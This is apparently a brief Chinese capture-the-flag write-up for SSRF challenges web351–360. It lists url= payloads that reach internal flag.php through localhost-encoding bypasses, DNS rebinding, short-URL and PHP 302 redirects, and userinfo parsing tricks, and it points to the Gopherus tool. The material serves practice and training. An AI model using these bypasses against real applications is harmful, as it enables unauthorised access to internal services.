具体解析请查看这里: 点击此处
web351、352、353 、355、356
url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://127.1/flag.php
url=http://2130706433/flag.php
url=http://017700000001/flag.php
url=http://0b1111111000000000000000000000001/flag.php
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
url=http://localhost/flag.php
url=http://127.127.127.127/flag.php
web354、357
url=http://sudo.cc/flag.php
用127.0.0.0/flag.php生成一个短网址 然后再构造payload:即可302跳转
?url=https://ock.cn/ork5o
写一个php文件到公网:
<?php header("Location: http://127.0.0.1/flag.php");
# POST: url=http://your-domain/ssrf.php
# POST: url=http://sunlight316.cn/302.php
web358
url=http://ctf.@127.0.0.1/flag.php?show
//ctf开头show结尾
web359、360
gopherus脚本
git clone https://github.com/tarunkant/Gopherus